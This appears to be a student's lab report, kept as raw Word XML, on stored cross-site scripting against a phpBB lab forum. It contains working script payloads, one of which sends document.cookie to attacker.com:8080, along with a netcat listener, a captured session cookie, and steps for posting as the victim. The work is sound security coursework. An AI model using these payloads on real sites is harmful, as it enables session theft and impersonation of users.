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14259E" w14:textId="77777777" w:rsidR="00A70FF5" w:rsidRPr="00506865" w:rsidRDefault="00A70FF5" w:rsidP="00A70FF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00506865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Task 1 (20 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF3EA3A" w14:textId="1B64EE94" w:rsidR="00A70FF5" w:rsidRDefault="00A70FF5" w:rsidP="003E37D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Include the screenshot of the alert window, and the message including JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8B8C3" w14:textId="4A4DC734" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5">
      <w:r>
        <w:t>Attacker makes post with malicious script</w:t>
      </w:r>
      <w:r w:rsidR="00A04529">
        <w:t xml:space="preserve">, and submits post to forum. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DFFE31" w14:textId="662ED727" w:rsidR="00506865" w:rsidRPr="00476620" w:rsidRDefault="00506865" w:rsidP="003E37D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Message: task 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>[quote]&lt;script&gt;alert(“Hello Web!”)&lt;/script&gt;[/quote]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A24D69" w14:textId="47F1CC36" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="125828E8" wp14:editId="473A782E">
            <wp:extent cx="6291634" cy="6291634"/>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293556" cy="6293556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234012C" w14:textId="205365B4" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5"/>
    <w:p w14:paraId="7C2E92F0" w14:textId="77777777" w:rsidR="00A04529" w:rsidRDefault="00A04529">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7179AA" w14:textId="422E1027" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Post is displayed on forum page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3F25B" w14:textId="018D1BFA" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67560070" wp14:editId="4EDE534A">
            <wp:extent cx="6644960" cy="5341296"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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66948" cy="5358970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D76E538" w14:textId="2B1EC0E1" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5"/>
    <w:p w14:paraId="0FFB95BD" w14:textId="77777777" w:rsidR="00A04529" w:rsidRDefault="00A04529">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA3B66" w14:textId="21C7FB2C" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Clicking on post </w:t>
      </w:r>
      <w:r w:rsidR="00A04529">
        <w:t>sends out alert of “Hello Web!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5B428" w14:textId="7FCB6F40" w:rsidR="003E37D5" w:rsidRDefault="00A04529" w:rsidP="003E37D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A77DBD8" wp14:editId="4685C361">
            <wp:extent cx="6914380" cy="5529957"/>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941799" cy="5551886"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B43E9" w14:textId="2DE2C2E1" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5"/>
    <w:p w14:paraId="0E8587D2" w14:textId="77777777" w:rsidR="003E37D5" w:rsidRDefault="003E37D5" w:rsidP="003E37D5"/>
    <w:p w14:paraId="40207031" w14:textId="77777777" w:rsidR="00A70FF5" w:rsidRDefault="00A70FF5">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9BBAB" w14:textId="368126A2" w:rsidR="00C148EC" w:rsidRPr="00D3764F" w:rsidRDefault="00A70FF5" w:rsidP="00A70FF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3764F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2 (10 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCDA05A" w14:textId="3866A78F" w:rsidR="008F6D76" w:rsidRDefault="00A70FF5" w:rsidP="00A70FF5">
      <w:r>
        <w:t xml:space="preserve">1. Include the screenshot of the shown cookies, and the message including </w:t>
      </w:r>
      <w:r w:rsidR="00C148EC">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED2ADC" w14:textId="2D704DB7" w:rsidR="00506865" w:rsidRDefault="00506865" w:rsidP="00506865">
      <w:r>
        <w:t>﻿Message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D361C89" w14:textId="057CABBA" w:rsidR="00506865" w:rsidRDefault="00506865" w:rsidP="00506865">
      <w:r>
        <w:t>Display user's cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>[quote]&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;[/quote]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7408DC" w14:textId="77777777" w:rsidR="00506865" w:rsidRDefault="00506865" w:rsidP="00506865">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780767C1" wp14:editId="3C52F93F">
            <wp:extent cx="6645910" cy="5416550"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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96815" cy="5458039"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7999654E" w14:textId="22DD004E" w:rsidR="00C148EC" w:rsidRDefault="00506865" w:rsidP="00506865">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="408CFE2A" wp14:editId="0743ACED">
            <wp:extent cx="4855467" cy="3931788"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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86538" cy="3956948"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13617B31" wp14:editId="1805F6A4">
            <wp:extent cx="6645910" cy="5330825"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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5330825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00C148EC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3D55A" w14:textId="30072AA5" w:rsidR="00C148EC" w:rsidRPr="00D3764F" w:rsidRDefault="00A70FF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3764F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3 (20 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06765378" w14:textId="6C32730F" w:rsidR="00A70FF5" w:rsidRDefault="00C148EC" w:rsidP="00C148EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C148EC">
        <w:t>You need to write a program or use a tool to receive the data sent by the attacker. Describe and explain the used program/tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2337D532" w14:textId="1A969499" w:rsidR="008B3740" w:rsidRDefault="00C87167" w:rsidP="00A70FF5">
      <w:r>
        <w:t xml:space="preserve">Code written: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF7C37" w14:textId="2775C8DE" w:rsidR="00C87167" w:rsidRPr="00476620" w:rsidRDefault="00C87167" w:rsidP="00A70FF5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>('&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>="http://attacker.com:8080/?c='+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>+'" /&gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7BB8C" w14:textId="79D2CDF6" w:rsidR="00C87167" w:rsidRDefault="00C87167" w:rsidP="00A70FF5"/>
    <w:p w14:paraId="273449FC" w14:textId="0AC8CAA4" w:rsidR="00C87167" w:rsidRDefault="00C87167" w:rsidP="00A70FF5">
      <w:r>
        <w:t>Tools used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54129C77" w14:textId="3760828C" w:rsidR="00C87167" w:rsidRDefault="00C87167" w:rsidP="00A70FF5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13D1C9AD" w14:textId="77777777" w:rsidR="00C87167" w:rsidRDefault="00C87167" w:rsidP="00A70FF5"/>
    <w:p w14:paraId="063F4751" w14:textId="54F5A2C6" w:rsidR="00A70FF5" w:rsidRDefault="00A70FF5" w:rsidP="00C148EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Include the screenshot showing the stolen cookies on the attacker side, and the employed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E725E31" w14:textId="34947CF5" w:rsidR="00C148EC" w:rsidRDefault="00C148EC" w:rsidP="00A70FF5"/>
    <w:p w14:paraId="3F8A7FEC" w14:textId="18ACF820" w:rsidR="00C148EC" w:rsidRDefault="00C87167" w:rsidP="00A70FF5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB7AF01" wp14:editId="54AE7FA2">
            <wp:extent cx="6645910" cy="5307965"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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5307965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="275453CA" w14:textId="50CB1548" w:rsidR="00C148EC" w:rsidRDefault="00C148EC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00C87167">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19FC5808" wp14:editId="6ADE45F7">
            <wp:extent cx="5050574" cy="4121145"/>
            <wp:effectExtent l="0" t="0" r="4445"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58345" cy="4127486"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FE4ED" w14:textId="77777777" w:rsidR="00C87167" w:rsidRDefault="00C87167" w:rsidP="00A70FF5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D98E8B0" wp14:editId="4E19E890">
            <wp:extent cx="5507774" cy="4348963"/>
            <wp:effectExtent l="0" t="0" r="4445"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7009" cy="4356255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="297668A8" w14:textId="77777777" w:rsidR="00C87167" w:rsidRDefault="00C87167"/>
    <w:p w14:paraId="704936F3" w14:textId="77777777" w:rsidR="00C87167" w:rsidRDefault="00C87167">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5E514A" wp14:editId="36BD6583">
            <wp:extent cx="6645910" cy="5351780"/>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5351780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686308E" w14:textId="77777777" w:rsidR="00C87167" w:rsidRDefault="00C87167">
      <w:r>
        <w:t>Cookie =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C07D91D" w14:textId="7EFDBE40" w:rsidR="00C87167" w:rsidRPr="00476620" w:rsidRDefault="00C87167">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;%20phpbb2mysql_sid=a169fd2e111202f8cb01e0cacd6b7902</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="449FB575" w14:textId="4B4E0AF9" w:rsidR="00A70FF5" w:rsidRPr="00D3764F" w:rsidRDefault="00A70FF5" w:rsidP="00A70FF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3764F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4 (35 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E012AD6" w14:textId="13441358" w:rsidR="00A70FF5" w:rsidRDefault="00A70FF5" w:rsidP="00C148EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Explain the importance of the HTTP request components in forging a message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB75D4" w14:textId="5831F3D3" w:rsidR="00C148EC" w:rsidRDefault="002D4736" w:rsidP="00C148EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5903839F" wp14:editId="068284EC">
            <wp:extent cx="5187590" cy="4256243"/>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98222" cy="4264966"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21165DCD" w14:textId="77777777" w:rsidR="002D4736" w:rsidRDefault="007D1838" w:rsidP="002D4736">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="002D4736" w:rsidRPr="00FF35D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.xsslabphpbb.com/posting.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002D4736">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5A7CA" w14:textId="47FBC737" w:rsidR="002D4736" w:rsidRDefault="002D4736" w:rsidP="002D4736">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the URL of the posting service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EEC2C3" w14:textId="07097819" w:rsidR="002D4736" w:rsidRDefault="002D4736" w:rsidP="002D4736">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4736">
        <w:t>Cookie: phpbb2mysql_data=......;phpbb2mysql_sid=......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1150FE46" w14:textId="7F8A1E95" w:rsidR="002D4736" w:rsidRDefault="002D4736" w:rsidP="002D4736">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This header field contains the session cookie of the user. It is attached along with every HTTP request to the PHPBB website. This field is set automatically by browser, so attacker does not need to set this field. Just needs to sniff this cookie. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C4341C" w14:textId="19C4A9A5" w:rsidR="002D4736" w:rsidRDefault="004022C6" w:rsidP="004022C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004022C6">
        <w:t>subject=&lt;Content of the message&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF8D16" w14:textId="24919B0F" w:rsidR="002D4736" w:rsidRDefault="004022C6" w:rsidP="00125EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>This is our target area. Here is where we will put our forged message on behalf of the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B424E3F" w14:textId="2AF7F65F" w:rsidR="00D3764F" w:rsidRDefault="00D3764F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B37481" w14:textId="77777777" w:rsidR="002D4736" w:rsidRDefault="002D4736" w:rsidP="002D4736"/>
    <w:p w14:paraId="4DD52BB5" w14:textId="3B797DFD" w:rsidR="00A70FF5" w:rsidRDefault="00A70FF5" w:rsidP="00C148EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Include the screenshot and description of how to post a message on behalf of the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE32E53" w14:textId="77777777" w:rsidR="009F445F" w:rsidRDefault="009F445F" w:rsidP="009F445F"/>
    <w:p w14:paraId="700D24CF" w14:textId="405FAECE" w:rsidR="00151434" w:rsidRDefault="00151434" w:rsidP="00151434">
      <w:r>
        <w:t>I worked on this question on a different day as Task 3 so the cookie taken is different. But the process is the same as Task 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0E6515" w14:textId="66F782BE" w:rsidR="00D3764F" w:rsidRDefault="00D3764F">
      <w:r>
        <w:t xml:space="preserve">Step 1: steal </w:t>
      </w:r>
      <w:r w:rsidRPr="00B052BF">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="00151434">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00151434" w:rsidRPr="00151434">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00151434">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of victim/admin</w:t>
      </w:r>
      <w:r w:rsidR="009F445F">
        <w:t xml:space="preserve"> via method in Task 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CA8835" w14:textId="45369115" w:rsidR="00B052BF" w:rsidRDefault="00D3764F">
      <w:r>
        <w:t>Refer to task 3 for in</w:t>
      </w:r>
      <w:r w:rsidR="00151434">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>depth explanation.</w:t>
      </w:r>
      <w:r w:rsidR="00151434">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C957BA" w14:textId="037929F3" w:rsidR="00D3764F" w:rsidRDefault="00B052BF" w:rsidP="00D3764F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A4B0ED1" wp14:editId="0174A7AD">
            <wp:extent cx="6645910" cy="6686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668655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF5F37" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve">root@cs4238-VirtualBox:/home/attack# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB47069" w14:textId="77777777" w:rsidR="00B052BF" w:rsidRPr="00476620" w:rsidRDefault="00B052BF" w:rsidP="00B052BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
        </w:rPr>
        <w:t>GET /?c=</w:t>
      </w:r>
      <w:r w:rsidRPr="00476620">
        <w:rPr>
          <w:rFonts w:ascii="Andale Mono" w:hAnsi="Andale Mono"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
